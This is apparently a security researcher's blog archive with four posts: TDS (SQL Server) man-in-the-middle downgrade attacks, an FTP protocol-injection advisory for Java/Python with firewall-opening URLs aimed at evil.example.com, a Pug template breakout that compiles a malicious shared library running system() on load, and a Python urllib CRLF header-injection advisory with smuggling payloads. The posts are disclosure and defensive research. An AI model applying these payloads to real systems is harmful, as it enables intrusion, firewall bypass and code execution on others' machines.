Tuesday, December 19, 2017

Advanced SQL Server Man-in-the-Middle Attacks

UPDATE: A few days after publishing this, Microsoft begin making updates to the referenced documentation. I haven't reviewed these updated versions for technical accuracy, but it is nice to see some movement from their side.

In an application security assessment I performed alongside the fine folks at Summit Security Group, we encountered an application that was relying heavily on the encryption features of the Tabular Data Stream (TDS) protocol. These protocol features are implemented in Microsoft SQL Server to protect communications over untrusted networks. Out of curiosity, we investigated how different configuration settings on both the server and client change the security properties of this protocol. We quickly realized that our client's communications were insecure. To demonstrate the risk, we developed a man-in-the-middle (MitM) tool which exploited two separate insecure configurations. In sharing with the community, we hope this article will raise awareness about how easy it is to make similar mistakes when implementing TDS encryption.

Background

The Tabular Data Stream (TDS) protocol is used by Microsoft SQL Server as the primary way in which clients interact with the database server. The protocol has been updated many times over the years to support additional features, including the use of TLS-based encryption implemented as an opportunistic mechanism. This opportunistic encryption is implemented in a way that is similar to STARTTLS. An initial unencrypted handshake occurs, and if both sides advertise support for encryption, then a TLS handshake occurs on the same TCP connection, therafter allowing further communications to continue over this encrypted tunnel. As with any opportunistic encryption, the protocol can be highly vulnerable to downgrade attacks and other man-in-the-middle attacks if clients and servers are not carefully configured. Exacerbating this issue is the fact that much of Microsoft's documentation on the topic is confusing, incorrect, or creates a false sense of security about certain configuration settings.

Attack 1: Certificate Forgery

Anyone using TLS must be mindful of how certificates are validated. The first thing an attacker is likely to try against any TLS implementation is to conduct a man-in-the-middle attack that presents self-signed or otherwise forged certificates to TLS clients (and servers, if client certificates are in use). To its credit, Microsoft's implementation of TDS is safe in the sense that it enables certificate validation by default, which prevents this attack. Developers would need to explicitly disable certificate validation to be vulnerable. With that said, this is fairly common in development environments given that developers often want to avoid the effort of setting up certificates on non-production machines. During security assessments, we want to ensure certificate validation is enabled in the actual production deployment. In this particular engagement, we couldn't find an off-the-shelf tool that made it easy to test for this issue in TDS, so we rolled our own.

Our TDS MitM script can be run in "cert" mode through the "--mitm_type" option. This causes the script to perform a classic certificate man-in-the-middle attack whereby a TLS connection is accepted from the client, but a second one is initiated to the server before the handshake is finished. The script leverages the Bletchley SSL/TLS library to automatically clone the server's advertised certificate, and then presents a fake version to the client.

Attack 2: Asymmetric Downgrade

When TDS clients connect to Microsoft SQL Server, an unencrypted handshake ensues where both parties advertise whether or not they are configured to use encryption. Each side can claim one of the following: encryption is not supported (ENCRYPT_NOT_SUP); encryption is supported, but prefer not to use it (ENCRYPT_OFF); encryption is supported and prefer to use it (ENCRYPT_ON); encryption is required (ENCRYPT_REQ). The first three are useful for backward compatibility, but from a security perspective, requiring encryption is the only secure option. If neither party explicitly requires encryption, then a trivial man-in-the-middle attack is possible whereby the attacker can update the values of both handshake messages to say that encryption is not supported. From there, both the client and server will just assume they can't use encryption and will move forward with an insecure conversation. This classic downgrade attack, as applied to TDS, was discussed in detail by Azhar Desai in 2015. Interestingly enough, the story doesn't end there. What happens if one party requires encryption, but the other doesn't? Is an attack still possible?

As it turns out, yes. In the specific case where the server requires encryption to be used, but the client does not, then an asymmetric downgrade attack is fairly easy to conduct. In the early handshake packets, we know the server will advertise ENCRYPT_REQ, attempting to signal to the client that encryption must be used. Meanwhile the client will advertise some other level of support for encryption (ENCRYPT_ON or ENCRYPT_OFF). During the exploit, our attacker modifies the server's handshake packet and sets it to ENCRYPT_NOT_SUP. This will trigger the client to disable encryption during further transactions. However, the server is still going to expect a TLS handshake to come next. At that point, the attacker impersonates the client and initiates a TLS handshake on their behalf. Since the server doesn't require any TLS client certificate (only server certificates are verified in TDS), the server is none the wiser and continues to communicate with the attacker posing as the client.

Next, the attacker simply relays all further communications between the two parties. As messages come from the server over the TLS channel, they are decrypted and forwarded over an unencrypted TDS connection to the client. Likewise, when the client sends messages unencrypted to the attacker's proxy, the attacker just relays those over the TLS link to the server. Included in these forwarded messages is the client's password authentication handshake, which typically exposes the database user's password hash, or perhaps even the plaintext password.

The following diagrams summarize the steps of this attack. In the first diagram, we have an unaltered handshake where a client wants to use encryption (but doesn't require it) and the server does require it:

That communication would be vulnerable to attack, however, since the client doesn't require encryption. The man-in-the-middle attack in that situation would look like the following:

Our TDS MitM script executes this attack when you use "downgrade" through the "--mitm_type" option.

Ok, that's spiffy, but what if a TDS client requires encryption and the server doesn't? Is an attack still possible? I'm not aware of one. It is different in this case, because TLS is authenticated in only one direction. If the client is both requiring encryption to be used and is validating the server's certificate on that connection (assuming certificate validation hasn't been explicitly turned off), then the connection is sound. An attacker could clearly fool the server into using no encryption on one side of the man-in-the-middle proxy, but the client-side conversation won't get very far if the attacker can't fool the client into trusting an invalid server certificate.

As it turns out, only two things actually matter for providing communications security in TDS traffic with TLS: the client must be configured to require encryption and it must be configured to validate the server certificate. All of the server-side settings are just backward-compatibility baggage that add to confusion.

Misleading Documentation

Throughout this research, we reviewed a great deal of documentation provided by Microsoft, but found many of the documents create a false sense of security, mislead developers, or in the worst cases, contained incorrect statements about security-critical details. Here we list some of these errata to help set the record straight and encourage Microsoft to address these items to reduce confusion within the MSSQL user population.

In the now out-of-date article How to enable SSL encryption for an instance of SQL Server by using Microsoft Management Console, the following advice appears in a highlighted note: "Do not enable the Force Protocol Encryption option on both the client and the server. To enable Force Protocol Encryption on the server, use the Server Network Utility or SQL Server Configuration Manager, depending on the version of SQL Server. To enable Force Protocol Encryption on the client, use the Client Network Utility or SQL Server Configuration Manager." This is odd, since requiring protocol encryption on the client and server at the same time should work just fine. In addition, we now know that the setting on the server side is irrelevant to security.
In Enable Encrypted Connections to the Database Engine, step-by-step procedures are provided showing how to configure a server to require encryption under the heading “To configure the server to accept encrypted connections”. The "to accept" wording of this heading is confusing, since SQL Server already accepts encrypted connections by default. It just doesn't require them by default. Also, there is absolutely no indication to the reader that this setting provides no additional communications security, whereas the client-side setting described in the same article actually does.
In one of Microsoft's most recent articles, Using Encryption Without Validation, there are almost too many misguided or incorrect statements to enumerate in a blog post like this.

For one, the article's title itself should be a huge red flag to anyone in security. Using TLS without certificate validation clearly defeats the whole purpose of using encryption in the first place. We strongly urge Microsoft to include an explicit warning in this article to highlight this fact.
From the very first sentence of the article, we have a problem: "SQL Server always encrypts network packets associated with logging in." – This fails to mention that the encrypted handshake is based on NTLM authentication, which any seasoned security expert would know has been riddled with cryptographic flaws for decades. Such flaws can allow for relay attacks and offline password cracking, at a minimum. Even worse, there are fairly recent claims that a downgrade attack is possible on the password authentication handshake itself, allowing for full plaintext password retrieval. There is even a Metasploit module designed specifically to conduct these attacks! Finally, even if this password authentication handshake were securely designed, an attacker could just hijack the TCP connection after authentication is completed to gain the same access as the victimized client.
In the next paragraph, we find: "This may also be configured by SQL Server Configuration Manager using the Force Protocol Encryption option." – As mentioned several times before, we know now that the server-side setting provides no security.
Shortly thereafter, we have: "To enable encryption to be used when a certificate has not been provisioned on the server, SQL Server Configuration Manager can be used to set both the Force Protocol Encryption and the Trust Server Certificate options. In this case, encryption will use a self-signed server certificate without validation if no verifiable certificate has been provisioned on the server." – This last sentence is very misleading. If the Trust Server Certificate option is set on the client, then the communications are vulnerable to certificate man-in-the-middle attacks. That's true even if you later deploy a verifiable certificate on the server. This sentence might lead a reader to believe the "fix" is just to deploy a verifiable certificate without also correcting the client-side settings.
The article provides a table with a breakdown of server and client-side settings, describing what would happen in each case. This proves useful for understanding behavior, but it repeatedly reinforces the idea that using some encryption with no certificate validation is somehow OK, or better than using no encryption at all. It isn't. With the right tool, active man-in-the-middle attacks are just as easy to conduct as passive sniffing in the vast majority of networking technologies we use today.

With that said, there are some articles from Microsoft that do a better job of explaining these settings. The Encrypting Connections to SQL Server article includes a clear warning that "SSL connections that are encrypted by using a self-signed certificate do not provide strong security. They are susceptible to man-in-the-middle attacks. You should not rely on SSL using self-signed certificates in a production environment or on servers that are connected to the Internet." This is a great warning and should exist in any article that discusses Trust Server Certificate settings (though I'd like to see a warning about requiring encryption as well).

Finally, the folks at Azure seem to have done their homework. All of the client connection strings they provide to customers as samples seem to include both an explicit TrustServerCertificate=False flag (which just explicitly enables certificate validation), as well as the appropriate flag to require encryption.

Vendor Response

We contacted the Microsoft Security Response Center (MSRC) on November 22, 2017 and sent them a draft version of this blog post along with the MitM script. We asked Microsoft to comment on our findings, offer any corrections, and to indicate whether their documentation would be updated. While the MSRC was responsive to our emails, their SQL Server product team has yet to respond.

Those Who Came Before

The concept of an asymmetric downgrade on SSL/TLS is hardly new. Moxie Marlinspike's sslstrip tool implemented this approach over five years ago. Downgrade attacks on STARTTLS mechanisms are not new either. Sadly, the application of these techniques to proprietary (if documented) protocols tends to be slow. At the time of our testing in early 2016, we weren't aware of any tools that allow for an asymmetric downgrade of TDS, let alone a simple certificate spoofing attack. As we polished up this document, we came across another tool, TDSBridge, which acts as a TDS proxy and includes a brief comment in the documentation: "it even works with server side forced encryption". Of course that should be an ominous sign to security folk and helps confirm our observations. While TDSBridge isn't a security-focused tool, we feel obligated to mention it since the author clearly discovered this fact before we did, even if it wasn't called out as a security risk.

Conclusion

Microsoft SQL Server database traffic is insecure by default, because encryption is not required by client libraries. This is a forgivable default setting, considering the fact that correctly configured server certificates are needed to make communications secure anyway. However, the documentation guiding administrators on how to add communications security are deeply flawed in multiple ways and require revision. In light of the insecure default settings and the misleading documentation, it is our hunch that the vast majority of Microsoft SQL Server network traffic is vulnerable to man-in-the-middle attacks, even if SQL Server administrators have taken steps to secure it.

Monday, February 20, 2017

Advisory: Java/Python FTP Injections Allow for Firewall Bypass

UPDATE: Fixes for these issues have been out for a while. Therefore I've published a proof-of-concept exploit. Enjoy.

Overview

Recently, an vulnerability in Java's FTP URL handling code has been published which allows for protocol stream injection. It has been shown that this flaw could be used to leverage existing XXE or SSRF vulnerabilities to send unauthorized email from Java applications via the SMTP protocol. While technically interesting, the full impact of this protocol stream injection has not been fully accounted for in existing public analysis.

Protocol injection flaws like this have been an area of research of mine for the past few couple of years and as it turns out, this FTP protocol injection allows one to fool a victim's firewall into allowing TCP connections from the Internet to the vulnerable host's system on any "high" port (1024-65535). A nearly identical vulnerability exists in Python's urllib2 and urllib libraries. In the case of Java, this attack can be carried out against desktop users even if those desktop users do not have the Java browser plugin enabled.

As of 2017-02-20, the vulnerabilities discussed here have not been patched by the associated vendors, despite advance warning and ample time to do so.

The Bugs

Java is vulnerable to FTP protocol stream injection via malicious URLs in multiple contexts. If an attacker can convince any Java application to attempt to retrieve a malicious URL of this type, then the attacker can inject FTP commands into the client's protocol stream. For instance, the following URL:

ftp://foo:bar%0d%0aINJECTED@example.net/file.png

Allows for new lines (CRLF) to be injected in the TCP stream, making the receiving server think that "INJECTED" is a separate command sent by the client. The above URL, when fetched by Java, causes the following partial command sequence to be sent:

USER foo
PASS bar
INJECTED
TYPE I
EPSV ALL
PASV
...

Java is actually vulnerable to injection via multiple fields in the URL. The username field and any directory specified in the URL can also allow for injection.

Python's built-in URL fetching library (urllib2 in Python 2 and urllib in Python 3) is vulnerable to a nearly identical protocol stream injection, but this injection appears to be limited to attacks via directory names specified in the URL.

FTP Security Quirks

To fully understand the attack I am about to describe, it is critical to have a solid grasp of how the FTP protocol works. FTP's primary communications start on a "control channel", which is the TCP connection initiated by clients (typically to port 21) where human-readable commands and responses can be observed. Whenever file contents, directory listings, or other bulk data is transferred a secondary TCP connection, called the "data channel", is created for this purpose. In the classic protocol specification, the FTP client tells the server how to connect back to it at an IP address and random high port. The FTP server then connects back to the client and sends the requested data over this temporary channel. Once network address translation became popular, this caused problems for FTP, so a "passive mode" was introduced. In this passive mode, data channels are instead initiated by the client. (For the sake of clarity, the original FTP mode of data channel initiation will be hereafter referred to as "classic mode".) Over time, firewall implementations began to support classic mode FTP by performing control channel protocol inspection, and then dynamically routing server-initiated TCP connections back to the appropriate host.

The behavior of classic mode FTP and firewalls has been a source of security risk for a very long time. An attack was identified where a victim could be lured into running a non-privileged Java applet on a web page. This applet would create an FTP control channel back to the attacker's server and fool stateful firewalls into opening arbitrary TCP ports and relaying them back to the victim's desktop system. The first public mention of this apparently comes from Phrack issue #60, published in 2002. A few years later, a clearer write-up of the attack was published by Florian Weimer. Nearly 15 years since then, many commercial firewalls still support classic mode FTP by default.

Tricking Firewalls

Since our FTP control channel injection vulnerabilities allow us to take over the commands sent by FTP clients, it should be possible to pull off the firewall attacks described long ago, right? For instance, we could simply inject a malicious PORT command into the stream at the right moment. When the firewall sees this, it will translate the internal IP address and port for that command into an external address and port, and then enable a temporary NAT rule to allow a single TCP connection to come back in, relaying it to the FTP client.

Suppose for a moment that the victim host has an internal IP address of 10.1.1.1 and our attacker hosts a server at evil.example.com. Then we should expect the following FTP URL to fool the firewall into opening up port 1337:

ftp://u:p@evil.example.com/foodir%0APORT%2010,1,1,1,5,57/z.txt

(Note that in the classic FTP PORT command, the port number is represented as two separate ASCII-encoded octets. In short: 1337 == 5*256 + 57) However, as it turns out there are actually two significant challenges in making this work in practice...

First Challenge: Determining Internal IP

Of course to pull this off, the attacker needs to know the victim's internal IP address (or else the stateful firewall will ignore the PORT command). Let's assume the attacker gets multiple bites at the cherry. That is, they can send a URL, see how the client behaves, then try another until the attack is successful. (Only 2-3 attempts should be required, as you'll see by the end of this.)

As a first probe, the attacker can simply supply the victim with an FTP URL that points to an unusual port on the attacker's server, such as:

ftp://u:p@evil.example.com:31337/foodir/z.txt

Note that there are no protocol stream injection attempts happening here. FTP clients will attempt to initiate a passive session to retrieve the z.txt file, but if the attacker's FTP server rejects the PASV command, then the client will fall back to classic mode and send a PORT command. Since the port used for the control channel is non-standard, it is unlikely that a stateful firewall at the victim's site will attempt to interpret and translate the PORT commands on this session. That will cause the internal IP address of the victim to be leaked to the attacker.

Second Challenge: Packet Alignment

Everything up until now seems very easy. However, if you stop reading now, you won't know the key ingredient to this recipe.

FTP is designed as a synchronous, line-based protocol where each side of the communication writes one line and waits for a response from the other side before continuing. That means neither side of the communication should write more than one command before waiting for the other to respond.

The Linux conntrack developers take advantage of this fact to try and be extra sure that they really are seeing a PORT command on the wire. The implementation requires any PORT command to appear at the very beginning of a packet. Therefore, the following URL (as shown earlier) doesn't actually cause Linux firewalls to open up the desired port:

ftp://u:p@evil.com/foodir%0APORT%2010,1,1,1,5,57/z.txt

If you carefully observe the packet trace of this URL being fetched, you'd see commands sent by the client coming in the following individual packets:

--Packet 1--
USER u
--Packet 2--
PASS p
--Packet 3--
TYPE I
--Packet 4--
CWD foodir
PORT 10,1,1,1,5,57
--Packet 5--
...

Since the PORT command comes in the middle of Packet 4, Linux ignores it.

The secret ingredient is that we need to find a way to force the client to send the PORT command at the very beginning of a packet, even though two commands were sent in a single write(2) call by Java or Python. Of course it is possible for a user-space application to perform a write(2) call to a socket with data that is much larger than the packet size supported by the TCP/IP stream. What if our CWD command had a directory name that was just long enough such that it filled up exactly one TCP packet? Then "PORT..." would be forced to start at the beginning of very next packet!

This can be tricky to pull off, since MTU sizes can be relatively large (and a Java/Python application might complain about receiving a very long URL during the attack). Also, network conditions between any pair of hosts will vary, making it hard to predict the effective MTU sizes up front. To simplify things, we can simply force the FTP control channel's TCP connection to use the minimum MTU size, since we control the malicious FTP server. On the attacker's side, firewall rules can be used to clamp the MSS to 536 bytes, which makes our malicious URLs much easier to calculate. From there, some basic trial and error can be used to determine what length the directory name must be to exactly align with a packet boundary.

Why are we so interested in fooling the Linux conntrack module? As it turns out, many commercial firewall implementations use Linux as their base firewall. More on that below. Other firewalls may use similar checks to mitigate FTP shenanigans, but we have not yet researched this.

Proof of Concept

An exploit for the attack described here has been developed. The script starts up by providing the attacker a URL to test against the victim, and then initiates a malicious FTP server. Upon receiving the first request, the FTP server interactively calculates a new URL containing a directory name length which causes the PORT command to land at the beginning of a packet. The entire attack (including the request used to determine the victim's internal IP) is typically accomplished with just three SSRF attacks to open up one TCP port. Each additional SSRF attack could open up one additional TCP port. Since most firewalls do not allow FTP data channels to be set up by clients on ports below 1024, the ports an attacker can target are limited to the 1024-65535 range.

The exploit script will not be released until both Oracle and Python developers correct their FTP client code.

Attack Scenarios

There are a variety of situations where we could convince a Java application to fetch our URLs, which we discuss briefly here.

JNLP Files

This is perhaps the most startling attack scenario. If a desktop user could be convinced to visit a malicious website while Java is installed, even if Java applets are disabled, they could still trigger Java Web Start to parse a JNLP file. These files could contain malicious FTP URLs which trigger this bug. A clever attacker could weaponize the exploit to identify the victim's internal IP address, determine the appropriate packet alignment, and then exploit the bug all in one shot. A clever implementation could even open many ports at once using a single JNLP file. Also note, that since Java parses JNLP files before presenting the user with any security warnings, the attack can be fully successful without any indication to the user (unless the browser itself warns the user about Java Web Start being launched).

Man-in-the-Middle

If a Java or Python (urllib) application is fetching any HTTP URL, then a privileged network attacker could inject an HTTP redirect to bootstrap this attack.

Server-Side Request Forgery (SSRF)

If an application accepts any HTTP, HTTPS, or FTP URL, then exploitation is straight-forward. Even if the application accepts only HTTPS or HTTP URLs due to (naive) input validation, then an attacker could simply redirect the client to a malicious FTP URL.

XML eXternal Entities (XXE)

Most XXE bugs yield SSRF-like access, so this is pretty straight-forward. Note that some XXE vulnerabilities aren't very practical to exploit due to XML parser settings, preventing classic entity attacks. However, in some of these cases SSRF is still possible through DOCTYPE headers. If external entities are supported by an XML parser, then several URLs could be included in a single document, allowing for IP address determination, packet alignment determination, and finally an exploit (using dynamic redirection) all in one XXE attack.

Firewall Testing

Most FTP translation testing was performed against a custom Linux firewall running a recent kernel. Many commercial firewalls use Linux as a base operating system for their appliances. In many cases, these vendors enable classic mode FTP by default. Limited testing was performed against a Palo Alto firewall and a Cisco ASA firewall, both of which appeared to be vulnerable under default settings. While testing of commercial firewalls has been very limited at this point, it seems likely that a significant percentage of production firewalls in the world are susceptible to attack through FTP protocol stream injections.

Responsible Disclosure

The Python security team was notified in January 2016. Information provided included an outline of the possibility of FTP/firewall attacks. Despite repeated follow-ups, there has been no apparent action on their part.

Oracle was notified in early November 2016 with full details of the attack. No patch for Java is currently available.

Prior Research

The recent disclosure of SMTP attacks using FTP protocol injection was the impetus for releasing these details now. However, previous researchers had already published information showing the protocol stream injection existed. Between these two publications and knowledge of the Java/Firewall Attack, it is not a leap to realize FTP shenanigans might be possible as well.

Recommendations for Vendors

Commercial Firewall Vendors

Disable classic mode FTP by default. Add prominent warnings to configuration interfaces that enabling it carries unnecessary risk. (Even after these protocol injections are fixed, other injections have been known to appear which could be used to exploit this condition.)

Linux netfilter Team

Consider adding prominent warnings to the documentation for conntrack that discuss the risk of enabling FTP translation (and perhaps other translation). Perhaps this will help discourage future commercial device vendors from making the same mistakes of the past.

Other Software/Service Vendors

Audit your applications to be sure they are not vulnerable to SSRF or XXE attacks. XML parsing in Java is currently vulnerable by default, making XXE vulnerabilities very common on that platform.

Recommendations for the General Public

Consider uninstalling Java from all desktop systems. If this is not possible due to legacy application requirements, disable the Java browser plugin from all browsers and disassociate the .jnlp file extension from the Java Web Start binary.
Consider requesting an update to fix these issues from Oracle and the Python Software Foundation. Be sure to apply security updates to all versions of Java and Python, including those running on application servers and appliances.
Disable classic mode FTP in all firewalls, allowing only passive mode.

Sunday, September 4, 2016

Node.js: Breaking Out of Jade/Pug with process.dlopen()

UPDATE #1: The Jade/Pug developers emphasized to me that they never intended there to be any kind of "sandbox" or other controls limiting arbitrary code execution once you are within a template context. The difficulty of breaking out of the limited namespace is simply an unintentional technical artifact.

UPDATE #2: James Kettle had pointed out a far simpler Jade breakout a full year before I published this. I wish I saw that before embarking on my research... =/

Not long ago I was asked by a client to provide a short training on writing secure Node.js applications. As part of the class, I decided to build an intentionally-vulnerable Express application (under Node 4.x) that allowed insecure file uploads. In one scenario I created, the application was susceptible to a directory traversal vulnerability, allowing students to upload arbitrary Jade/Pug templates that the application would later execute. I'm not sure if this is a very common condition in Express applications, but it is plausible that it could show up in real-world apps.

Pug does allow server-side JavaScript execution from within templates, so when I was initially building this vulnerable application I assumed students would be able to immediately set up whatever backdoor they chose from within their malicious templates. However, I quickly realized I was mistaken! In fact, Pug sets up only a very limited scope/namespace for code to execute within. Most Node.js global variables are not available, and require() isn't available, making it very hard to get access to fun things like child_process.exec(). The Jade developers have set themselves up a makeshift sandbox for this template code, which is great to see.

Of course for someone like me, a sandbox doesn't look so much like a road block as it looks like a fun challenge. ;-) Clearly if a developer were to explicitly expose local variables to Pug when evaluating a template, and those local variables had dangerous methods or otherwise exposed important functionality, then an attacker might be able to leverage that application-specific capability from within Pug to escalate privileges. However, that's speculative at best and will vary from one app to the next, so it would be more interesting if there was a general purpose way to break out of Pug.

As basic reconnaissance, I began to enumerate the few global variables that are exposed in Pug. I started with a simple template and tested it from the command line:

$ echo '- for (var prop in global) { console.log(prop); }' > enumerate.jade
$ jade enumerate.jade

global
process
GLOBAL
root
Buffer
clearImmediate
clearInterval
clearTimeout
setImmediate
setInterval
setTimeout
console
  rendered enumerate.html

Next, I began just printing out one object at a time to see a listing of methods and such, but it seemed like some pretty slim pickings. I'll spare you the excitement of how many methods and APIs I read about over the next hour or so. Yet even a blind dog finds a bone now and then, and finally I stumbled across an interesting method in the process object:

...
  _debugProcess: [Function: _debugProcess],
  _debugPause: [Function: _debugPause],
  _debugEnd: [Function: _debugEnd],
  hrtime: [Function: hrtime],
  dlopen: [Function: dlopen],
  uptime: [Function: uptime],
  memoryUsage: [Function: memoryUsage],
  binding: [Function: binding],
...

That scratched a part of my brain that is firmly outside of Node.js land. Of course! This is a wrapper to dlopen(3). Shared libraries (e.g. .so files, or .dll files on lesser operating systems) are code, and that is going to pique any hacker's interest. This method does not appear in the Node.js documentation, but it is definitely discussed around the webbernet in the context of Node.js, if you look for it. As it turns out, the Node.js wrapper to dlopen expects shared libraries to be proper Node-formatted modules. These are just regular shared libraries with certain additional symbols defined, and to be honest, I haven't absorbed every detail with respect to what these modules look like. But suffice it to say, you can't just load up the libc shared library and call system(3) to get your jollies, since Node's dlopen will blow up once it realizes libc.so isn't a proper Node module.

Of course we could use dlopen to load up any native Node module that is already installed as a dependency to the application. An attacker may need to know the full path to the pre-installed module, but one could guess that with a bit of knowledge of the standard install directories. That would afford an attacker access to any functionality provided by the module from within Pug, which could provide a stepping stone to arbitrary code execution. But once again, that's going to be installation/application-specific and isn't nearly as fun as a general purpose escalation.

Recall, however, that my intentionally vulnerable Express application allows file uploads! That's how I'm giving my students access to run Pug templates in the first place. So in this scenario, the attacker can just upload their own Node module as a separate file, containing whatever functionality they choose, and invoke it to gain access to that functionality within Pug code. The obvious way to do this would be to set up a proper Node build chain that creates a natively-compiled module. That seemed like a lot of work to me, so I came up with a short-cut. In order to load a module, Node needs to first call libc's dlopen. This function doesn't have nearly the pesky requirements that Node's module system does. What's more, libc (and Windows, for that matter) has the option to execute arbitrary code during the module load process. So before libc's dlopen even returns (and allows Node to verify the module exports), we can execute any code we like. So this is how I compiled my proof-of-concept payload using a simple shell script:

#!/bin/sh

NAME=evil

echo "INFO: Temporarily writing a C source file to /tmp/${NAME}.c"
cat > /tmp/${NAME}.c <<END
#include <stdio.h>
#include <stdlib.h>

/* GCC-ism designating the onload function to execute when the library is loaded */
static void onload() __attribute__((constructor));

/* Should see evidence of successful execution on stdout and in /tmp. */
void onload()
{
    printf("EVIL LIBRARY LOADED\n");
    system("touch /tmp/hacked-by-evil-so");
}
END

echo "INFO: Now compiling the code as a shared library..."
gcc -c -fPIC /tmp/${NAME}.c -o ${NAME}.o\
  && gcc ${NAME}.o -shared -o lib${NAME}.so

echo "INFO: Cleaning up..."
rm ${NAME}.o /tmp/${NAME}.c

echo "INFO: Final output is lib${NAME}.so in the current directory."

To test it locally, I simply ran this script to create the binary, and ran a bit of Pug code to attempt to load it as a module:

$ ./make-evil-so.sh 
INFO: Temporarily writing a C source file to /tmp/evil.c
INFO: Now compiling the code as a shared library...
INFO: Cleaning up...
INFO: Final output is libevil.so in the current directory.

$ echo "- process.dlopen('evil', './libevil.so')" > test.jade
$ jade test.jade

EVIL LIBRARY LOADED
/usr/local/lib/node_modules/jade/lib/runtime.js:240
  throw err;
  ^

Error: test.jade:1
  > 1| - process.dlopen('evil', './libevil.so')
    2| 

Module did not self-register.
    at Error (native)
    at eval (eval at  (/usr/local/lib/node_modules/jade/lib/index.js:218:8), :11:9)
    at eval (eval at  (/usr/local/lib/node_modules/jade/lib/index.js:218:8), :13:22)
    at res (/usr/local/lib/node_modules/jade/lib/index.js:219:38)
    at renderFile (/usr/local/lib/node_modules/jade/bin/jade.js:270:40)
    at /usr/local/lib/node_modules/jade/bin/jade.js:136:5
    at Array.forEach (native)
    at Object. (/usr/local/lib/node_modules/jade/bin/jade.js:135:9)
    at Module._compile (module.js:409:26)
    at Object.Module._extensions..js (module.js:416:10)
$ ls -la /tmp/*hack*
-rw-r--r-- 1 tim tim 0 Aug 26 19:23 /tmp/hacked-by-evil-so

As we expect, the library file fails to load as a true Node module, but the library's onload() function clearly ran with code of our choosing. Needless to say, this worked like a charm against the vulnerable app I created for the students.

Summary

Clearly this attack was possible because I set up the vulnerable application to accept file uploads in an unsafe way, which gave students access to both execute Jade/Pug templates and to upload shared libraries to complete the escalation. This may be a fairly uncommon situation in practice. However, there are a few other corner cases where an attacker may be able to leverage a similar sequence of steps leading to code execution. For instance, if a Pug template was vulnerable to an eval() injection during server-side JavaScript execution, then that would give an attacker access to the sandboxed execution context without needing to upload any files. From there, an attacker may be able to do one of the following to break out of the sandbox:

Any objects explicitly exposed to Pug in local variables by the application's developer could be leveraged to perhaps escalate privileges within the application or operating system, depending on the functionality exposed
Pre-installed native modules could be loaded up using dlopen, and any functionality in those could perhaps be used to escalate privileges
Under Windows, it may be possible to use dlopen with UNC paths to fetch a library payload from a remote server (I haven't tested this... would love to hear if others find it is possible!)

Am I forgetting any other possibilities? Probably. Ping me on Twitter if you have any other ideas.

Finally, I just want to make clear that I don't really fault the Pug developers for allowing this to occur. The code execution restrictions they have implemented really should be seen as a best-effort security measure. It is proactive and they should be applauded for it. The restricted namespace will certainly make an attacker's life difficult in many situations, and we can't expect the Pug developers to know about every little undocumented feature in the Node.js API. With that said: Should the Pug folks find a way to block dlopen access? Yes, probably. There's no good reason to expose this to Pug code in the vast majority of applications, and if a developer really wanted it, they could expose it via local variables.

Wednesday, June 15, 2016

Advisory: HTTP Header Injection in Python urllib

Update 1: The MITRE Corporation has assigned CVE-2016-5699 to this issue.
Update 2: Remarkably, Blogger stripped the %00 element from a non-clickable URL when I originally posted this. So I had to "fix" that by obfuscating it. *sigh*

Overview

Python's built-in URL library ("urllib2" in 2.x and "urllib" in 3.x) is vulnerable to protocol stream injection attacks (a.k.a. "smuggling" attacks) via the http scheme. If an attacker could convince a Python application using this library to fetch an arbitrary URL, or fetch a resource from a malicious web server, then these injections could allow for a great deal of access to certain internal services.

The Bug

The HTTP scheme handler accepts percent-encoded values as part of the host component, decodes these, and includes them in the HTTP stream without validation or further encoding. This allows newline injections. Consider the following Python 3 script (named fetch3.py):

#!/usr/bin/env python3

import sys
import urllib
import urllib.error
import urllib.request

url = sys.argv[1]

try:
    info = urllib.request.urlopen(url).info()
    print(info)
except urllib.error.URLError as e:
    print(e)

This script simply accepts a URL in a command line argument and attempts to fetch it. To view the HTTP headers generated by urllib, a simple netcat listener was used:

nc -l -p 12345

In a non-malicious example, we can hit that service by running:

./fetch3.py http://127.0.0.1:12345/foo

This caused the following request headers to appear in the netcat terminal:

GET /foo HTTP/1.1
Accept-Encoding: identity
User-Agent: Python-urllib/3.4
Connection: close
Host: 127.0.0.1:12345

Now we repeat this exercise with a malicious hostname:

./fetch3.py http://127.0.0.1%0d%0aX-injected:%20header%0d%0ax-leftover:%20:12345/foo

The observed HTTP request is:

GET /foo HTTP/1.1
Accept-Encoding: identity
User-Agent: Python-urllib/3.4
Host: 127.0.0.1
X-injected: header
x-leftover: :12345
Connection: close

Here the attacker can fully control a new injected HTTP header.

The attack also works with DNS host names, though a NUL byte must be inserted to satisfy the DNS resolver. For instance, this URL will fail to lookup the appropriate hostname:

http://localhost%0d%0ax-bar:%20:12345/foo

But this URL will connect to 127.0.0.1 as expected and allow for the same kind of injection:

http://localhost%00%0d%0ax-bar:%20:12345/foo

Note that this issue is also exploitable during HTTP redirects. If an attacker provides a URL to a malicious HTTP server, that server can redirect urllib to a secondary URL which injects into the protocol stream, making up-front validation of URLs difficult at best.

Attack Scenarios

Here we discuss just a few of the scenarios where exploitation of this flaw could be quite serious. This is far from a complete list. While each attack scenario requires a specific set of circumstances, there are a vast variety of different ways in which the flaw could be used, and we don't pretend to be able to predict them all.

HTTP Header Injection and Request Smuggling

The attack scenarios related to injecting extra headers and requests into an HTTP stream have been well documented for some time. Unlike the early request smuggling research, which has a complex variety of attacks, this simple injection would allow the addition of extra HTTP headers and request methods. While the addition of extra HTTP headers seems pretty limited in utility in this context, the ability to submit different HTTP methods and bodies is quite useful. For instance, if an ordinary HTTP request sent by urllib looks like this:

GET /foo HTTP/1.1
Accept-Encoding: identity
User-Agent: Python-urllib/3.4
Host: 127.0.0.1
Connection: close

Then an attacker could inject a whole extra HTTP request into the stream with URLs like:

http://127.0.0.1%0d%0aConnection%3a%20Keep-Alive%0d%0a%0d%0aPOST%20%2fbar%20HTTP%2f1.1%0d%0aHost%3a%20127.0.0.1%0d%0aContent-Length%3a%2031%0d%0a%0d%0a%7b%22new%22%3a%22json%22%2c%22content%22%3a%22here%22%7d%0d%0a:12345/foo

Which produces:

GET /foo HTTP/1.1
Accept-Encoding: identity
User-Agent: Python-urllib/3.4
Host: 127.0.0.1
Connection: Keep-Alive

POST /bar HTTP/1.1
Host: 127.0.0.1
Content-Length: 31

{"new":"json","content":"here"}
:12345
Connection: close

